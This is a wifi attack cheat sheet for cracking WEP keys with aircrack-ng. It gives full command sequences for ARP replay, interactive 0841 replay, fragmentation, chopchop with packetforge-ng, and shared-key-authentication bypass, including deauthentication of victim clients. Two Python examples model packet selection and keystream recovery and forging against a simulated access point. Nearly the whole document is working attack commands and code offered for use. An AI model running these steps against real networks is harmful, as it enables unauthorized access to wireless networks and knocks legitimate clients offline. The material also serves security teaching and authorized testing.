Wifi - WEP Cracking

Cracking WEP with a Client

ARP Request Replay Attack

Attack the ACCESS POINT

airmon-ng start wlan0 3 # monitor mode, locked to channel 3
airodump-ng -c 3 --bssid $AP_MAC -w arpreplay mon0 # dump traffic; the capture is written to arpreplay-01.cap

# Fake authentication for a more reliable attack: the AP only relays frames from an associated MAC,
# so $ATTACKER_MAC must be associated before the replayed ARP requests are accepted
aireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0

# ARP request replay: capture an ARP request from the client and resend it; every relay by the AP
# is re-encrypted with a new IV, which is what aircrack-ng needs
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0

# Deauthentication: kick the client so that it reconnects and sends a fresh ARP request for -3 to pick up
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0

# Cracking (can be started while airodump-ng is still writing; aircrack-ng re-reads the file as IVs accumulate)
aircrack-ng arpreplay-01.cap

Interactive replay attack

Interactive packet replay (also called the 0841 attack, after the frame control value it injects) forces the AP to generate new packets when ARP request replay is not available or not working: you pick a captured packet, optionally rewrite its 802.11 header, and replay it to the AP, which re-encrypts and re-broadcasts it with a fresh IV.

airmon-ng start wlan0 3 # only a particular channel : 3
airodump-ng -c 3 --bssid $AP_MAC -w clearcap mon0 # dump traffic

# fake authentication for a more reliable attack
aireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0

# interactive replay attack: candidate packets are ARP-request sized (min 68, max 86 bytes)
aireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # natural selection: a packet the AP already sent to broadcast (FromDS=1)
aireplay-ng -2 -b $AP_MAC -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0       # forced: take a client->AP packet (ToDS=1) and rewrite its header
# Packet selection (an ARP request is the packet that meets these characteristics):
# - APs always repeat packets destined to the broadcast address, re-encrypted with a new IV
# - -p 0841 sets the frame control bytes to 08 41: data frame, ToDS (To Distribution System) bit set, WEP bit set,
#   so the AP treats the packet as coming from a wireless client; -c sets the destination to broadcast
# - only the cleartext 802.11 header is rewritten; the IV, ciphertext and ICV stay as captured, so the AP still decrypts it
# answer "y" for each packet offered until the injection rate (pps) goes up

# cracking: with PTW (-z, the default since aircrack-ng 1.0) a 64-bit key usually falls with a few tens of thousands of IVs;
# the older KoreK attack (-K) needs far more, on the order of 250000 and up
aircrack-ng -0 -z -n 64 clearcap-01.cap
    * -0: coloured output
    * -z: PTW attack
    * -n: number of bits in the WEP key (64 or 128)

# replay a saved packet: aireplay-ng -2 stores each accepted packet in replay_src-MMDD-HHMMSS.cap,
# and -r reads a packet back from such a file (or from any pcap that holds one ARP request)
aireplay-ng -2 -r replay.cap mon0
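The packet-selection rules above, as an added example that is not part of the original page or of aircrack-ng: a small Python model of the two aireplay-ng -2 filters, run on constructed 802.11 data frames (the BSSID, client MAC and zero-filled 44-byte WEP body are made up for the example). natural_selection() mirrors the "-d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86" filter and force_packet() the "-t 1 -c FF:FF:FF:FF:FF:FF -p 0841" header rewrite; both function names are mine.

```python
import struct

BROADCAST = b"\xff" * 6
TYPE_DATA = 0x08                              # frame control byte 0: type = data, subtype = 0
TODS, FROMDS, PROTECTED = 0x01, 0x02, 0x40    # frame control byte 1 flag bits (WEP = "protected")


def build_data_frame(flags, addr1, addr2, addr3, body):
    """Minimal 24-byte 802.11 data header (FC, duration, addr1..3, seq ctl) followed by the WEP
    body (IV, key index, ciphertext, ICV). Duration and sequence number stay 0 for the example."""
    return struct.pack("<BBH6s6s6sH", TYPE_DATA, flags, 0, addr1, addr2, addr3, 0) + body


def natural_selection(frame, bssid, min_len=68, max_len=86):
    """Equivalent of  aireplay-ng -2 -b BSSID -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86:
    a WEP data frame the AP itself sent (FromDS=1, ToDS=0) to the broadcast address, whose total
    length fits an encrypted ARP request (24 hdr + 4 IV + 8 LLC/SNAP + 28 ARP + 4 ICV = 68, up to 86)."""
    if len(frame) < 24 or frame[0] & 0x0C != TYPE_DATA:
        return False
    flags = frame[1]
    if not flags & PROTECTED or not flags & FROMDS or flags & TODS:
        return False
    addr1, addr2 = frame[4:10], frame[10:16]  # with FromDS=1, ToDS=0: addr1 = DA, addr2 = BSSID
    return addr1 == BROADCAST and addr2 == bssid and min_len <= len(frame) <= max_len


def force_packet(frame, bssid, smac=None):
    """Equivalent of  aireplay-ng -2 -b BSSID -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 [-h SMAC]:
    take a client-to-AP frame (ToDS=1) and rewrite only its header: frame control bytes 08 41
    (data, ToDS, WEP), addr1 = BSSID, addr2 = source MAC (the captured one unless -h is given),
    addr3 = broadcast. The IV, ciphertext and ICV are untouched: the ICV covers only the payload,
    so the AP still decrypts the frame and re-broadcasts it under a fresh IV."""
    if len(frame) < 24 or frame[0] & 0x0C != TYPE_DATA or not frame[1] & TODS:
        raise ValueError("need a ToDS data frame")
    addr2 = smac if smac is not None else frame[10:16]
    header = struct.pack("<BBH6s6s6sH", 0x08, 0x41, 0, bssid, addr2, BROADCAST, 0)
    return header + frame[24:]


if __name__ == "__main__":
    ap = bytes.fromhex("00146c7e4080")       # constructed BSSID
    client = bytes.fromhex("0013ce123456")   # constructed client MAC
    body = bytes(44)                         # constructed WEP body: 68-byte frame in total
    from_ap = build_data_frame(FROMDS | PROTECTED, BROADCAST, ap, client, body)
    to_ap = build_data_frame(TODS | PROTECTED, ap, client, bytes.fromhex("000c29aabbcc"), body)
    print("natural selection picks AP->broadcast frame:", natural_selection(from_ap, ap))
    print("natural selection rejects client->AP frame:", natural_selection(to_ap, ap))
    forced = force_packet(to_ap, ap)
    print("forced frame control:", forced[:2].hex(), "destination:", forced[16:22].hex())
```

The point both functions make is the same: WEP's integrity check covers only the encrypted payload, so the cleartext 802.11 header (direction bits and addresses) of any captured frame can be rewritten at will, and the AP will still accept, decrypt and re-broadcast it, handing out a new IV each time.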

Cracking WEP without a Client

  • Chopchop and fragmentation attacks recover a keystream (PRGA) for one IV without knowing the key; packetforge-ng uses it to forge an ARP request, and replaying that request makes the AP emit packets with new IVs
  • Need an AP configured with open system authentication (fake authentication has to succeed)

Prerequisite:

# put into monitor mode on our desired channel
airmon-ng start wlan0 3 # only a particular channel : 3
airodump-ng -c 3 --bssid $AP_MAC -w wepcrack mon0 # writes wepcrack-01.cap; no client should be listed

# fake authentication attack with association timing (every 60 s try to reassociate so the AP keeps us associated)
aireplay-ng -1 60 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0 # our MAC should now appear as a client in airodump
# use -1 6000 to avoid a time out on APs that drop the association quickly.

Fragmentation attack

Goal: 1500 bytes of PRGA, enough to forge any full-size frame. Caveat: Atheros cards do not generate the correct packets unless the wireless card itself is set to the MAC address you are spoofing, so change the card's MAC to $ATTACKER_MAC before faking authentication.

# $ATTACKER_MAC must be associated (fake auth above)
# Press "Y" to use the captured packet; aireplay-ng writes the keystream to fragment-MMDD-HHMMSS.xor
aireplay-ng -5 -b $AP_MAC -h $ATTACKER_MAC mon0

# use our PRGA from the fragmentation attack to generate an ARP request
# frag.xor: the fragment-*.xor file written above
# SRC_ADDR: 192.168.1.100 
# DST_ADDR: 192.168.1.255, should not exist (broadcast address)
packetforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y frag.xor -w inject.cap
# -0: build an ARP request
# -k: the destination IP i.e. in ARP, this is "Who has this IP"
# -l: the source IP i.e. in ARP, this is "Tell this IP"

# check the packet
tcpdump -n -vvv -e -s0 -r inject.cap

# inject our crafted packet
aireplay-ng -2 -r inject.cap mon0

# crack the WEP key
# Aircrack-ng re-reads the capture as new IVs become available
aircrack-ng -0 wepcrack-01.cap

# if 64-bit WEP is used, cracking usually takes < 5 minutes
# if -n 64 has not succeeded after ~600000 IVs, assume a 128-bit key and switch to -n 128;
# after ~2000000 IVs also raise the fudge factor with `-f 4`
aircrack-ng -n 64 wepcrack-01.cap

KoreK Chopchop attack

Can't be used against every AP (some drop the truncated packets), but it might work when the fragmentation attack fails. It is much slower than the fragmentation attack, since it guesses the packet one byte at a time.

# chopchop attack: -4
# outputs: replay_dec-MMDD-HHMMSS.cap (the decrypted packet) and replay_dec-MMDD-HHMMSS.xor (the PRGA)
# Press "Y" (choose a small packet: every byte has to be guessed)
aireplay-ng -4 -b $AP_MAC -h $ATTACKER_MAC mon0

# check the decrypted packet and find the network addresses to use below
tcpdump -n -vvv -e -s0 -r replay_dec-*.cap

# use our PRGA from the chopchop attack (prga.xor: the replay_dec-*.xor file written above)
# SRC_ADDR: 192.168.1.100 
# DST_ADDR: 192.168.1.255, should not exist (broadcast address)
packetforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y prga.xor -w chopchop_out.cap

# inject our crafted packet
aireplay-ng -2 -r chopchop_out.cap mon0

# crack the WEP key
aircrack-ng -0 wepcrack-01.cap

Bypassing WEP Shared Key Authentication SKA

By default, most wireless drivers attempt open system authentication first and fall back to shared key authentication only if that fails. Shared key authentication itself leaks keystream: the AP sends a challenge in clear and the client returns it WEP-encrypted, so capturing one real client's authentication gives aireplay-ng enough PRGA to answer the AP's challenge without the key.

Prerequisite:

  • Authentication: Shared Key (airodump-ng shows SKA in the AUTH column)
  • Fake authentication fails because the AP rejects open-system authentication

# put into monitor mode on our desired channel
airmon-ng start wlan0 3 # only a particular channel : 3
airodump-ng -c 3 --bssid $AP_MAC -w sharedkey mon0

# deauthentication attack on the connected client so that it re-authenticates
# airodump should then display SKA under the AUTH column
# airodump-ng saves the PRGA taken from the challenge/response as sharedkey-01-<AP_MAC>.xor
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
# TO CHECK: aireplay-ng -0 10 -a $AP_MAC -c $VICTIM_MAC mon0

# fake authentication attack with association timing (every 60 s try to reassociate), using the captured PRGA
# aireplay-ng should display "switching to Shared Key Authentication"
# sharedkey.xor: the sharedkey-01-<AP_MAC>.xor file written by airodump-ng
# If you are using a PRGA file obtained from a chopchop attack, make sure that it is at least 144 bytes long
# If you get "Part2: Association Not answering...(Step3)", set the card's MAC to the address used for fake auth
aireplay-ng -1 60 -e $AP_SSID -y sharedkey.xor -b $AP_MAC -h $ATTACKER_MAC mon0

# ARP replay attack
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0

# deauthentication attack on the connected client
# speeds up the ARP attack: the reconnecting client sends a fresh ARP request for -3 to replay
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
# TO CHECK: aireplay-ng --deauth 1 -a $AP_MAC -h <FakedMac> wlan0mon

# crack the WEP key
aircrack-ng sharedkey-01.cap
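To show why the clientless attacks (fragmentation and chopchop feeding packetforge-ng) and the shared key bypass above work, here is an added Python example; it is mine, not the page's or the aircrack-ng project's code. It implements WEP's RC4/ICV encapsulation, recovers keystream from known plaintext, grows it to 1500 bytes with the fragmentation attack against a simulated access point, forges an ARP request the way packetforge-ng does from a .xor file, and recovers the shared-key-authentication keystream. The 40-bit key, IVs, MAC and IP addresses are constructed; the AccessPoint class is a simplification (it relays every reassembled frame as a broadcast and ignores 802.11 framing); the chopchop byte-guessing loop itself is not implemented, only what its .xor output enables; all function names are mine.

```python
import struct
import zlib

def rc4(key, n):
    """RC4 keystream of n bytes. WEP seeds RC4 with IV || secret key and nothing else."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def icv(data):
    """WEP integrity check value: a plain CRC-32 (little-endian) appended before encryption."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)

def wep_encrypt(key, iv, data):
    """WEP frame body: IV(3) | key index(1) | RC4(IV || key) applied to data || ICV."""
    return iv + b"\x00" + xor(data + icv(data), rc4(iv + key, len(data) + 4))

def wep_decrypt(key, body):
    """Returns (data, icv_ok); a WEP receiver silently drops frames whose ICV fails."""
    pt = xor(body[4:], rc4(body[:3] + key, len(body) - 4))
    return pt[:-4], pt[-4:] == icv(pt[:-4])

def forge(iv, prga, data):
    """packetforge-ng's job: encrypt chosen data under a known IV using only the recovered
    keystream (.xor file). No key needed, since WEP lets a sender reuse any IV."""
    pt = data + icv(data)
    if len(pt) > len(prga):
        raise ValueError("need %d keystream bytes, have %d" % (len(pt), len(prga)))
    return iv + b"\x00" + xor(pt, prga)

LLC_SNAP_ARP = b"\xaa\xaa\x03\x00\x00\x00\x08\x06"  # fixed first 8 plaintext bytes of any ARP frame

def recover_prga(body, known_plaintext):
    """Known plaintext XOR ciphertext = keystream for that frame's IV."""
    return body[:3], xor(body[4:4 + len(known_plaintext)], known_plaintext)

class AccessPoint:
    """Simulated AP holding the key: decrypts the fragments, drops the frame on any bad ICV,
    reassembles, and relays the result re-encrypted under a fresh IV (as it does for broadcasts)."""
    def __init__(self, key):
        self.key, self.iv_counter = key, 0

    def relay(self, fragments):
        data = b""
        for frag in fragments:
            d, ok = wep_decrypt(self.key, frag)
            if not ok:
                raise ValueError("bad ICV, frame dropped")
            data += d
        self.iv_counter += 1
        return wep_encrypt(self.key, struct.pack("<I", self.iv_counter)[:3], data)

def fragmentation_attack(ap, sniffed, target=1500):
    """Grow 8 keystream bytes into `target` bytes. Each round sends up to 16 fragments under the
    same IV, each carrying (keystream - 4) bytes of chosen plaintext plus its ICV; the AP relays the
    reassembled frame under a new IV, and because we chose every plaintext byte that relayed frame
    yields a keystream 16x longer: 8 -> 68 -> 1028 -> 1504 bytes in three rounds."""
    iv, prga = recover_prga(sniffed, LLC_SNAP_ARP)
    while len(prga) < target:
        chunk = len(prga) - 4
        payload = bytes((i * 7) & 0xFF for i in range(min(16 * chunk, target)))
        frags = [forge(iv, prga, payload[k:k + chunk]) for k in range(0, len(payload), chunk)]
        iv, prga = recover_prga(ap.relay(frags), payload + icv(payload))
    return iv, prga

def arp_request(sha, spa, tpa):
    """LLC/SNAP + ARP 'who has tpa, tell spa' (what packetforge-ng -0 -l spa -k tpa builds)."""
    return LLC_SNAP_ARP + struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 1, sha, spa, bytes(6), tpa)

def ska_keystream(challenge, response_body):
    """Shared key authentication leaks keystream: the AP sends a 128-byte challenge in clear and the
    client returns it WEP-encrypted, so response XOR (challenge || ICV) is 132 bytes of keystream for
    that IV (what airodump-ng saves as sharedkey-*.xor). Simplified: the real auth frame wraps the
    challenge in header fields, which are known too. forge(iv, prga, new_challenge) then answers
    any later challenge the AP sends us."""
    return recover_prga(response_body, challenge + icv(challenge))

if __name__ == "__main__":
    key = bytes.fromhex("0102030405")  # constructed 40-bit key; the attacker-side code never reads it
    ap = AccessPoint(key)
    sniffed = wep_encrypt(key, b"\x0a\x0b\x0c", arp_request(bytes(6), b"\xc0\xa8\x01\x01", b"\xc0\xa8\x01\x02"))
    iv, prga = fragmentation_attack(ap, sniffed)
    inject = forge(iv, prga, arp_request(bytes.fromhex("000c29aabbcc"), b"\xc0\xa8\x01\x64", b"\xc0\xa8\x01\xff"))
    print(len(prga), "keystream bytes; forged ARP request accepted by AP:", wep_decrypt(key, inject)[1])
```

Two design points carry the whole page: the ICV is a CRC, not a MAC, so anyone who knows the keystream can produce a valid ICV; and WEP never rejects a reused IV, so keystream recovered once for an IV stays usable for every frame the attacker injects under it. The forged ARP request is 36 bytes of plaintext, 44 bytes as a WEP body and 68 bytes as a frame, which is the size aireplay-ng's interactive filter (-m 68) looks for.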
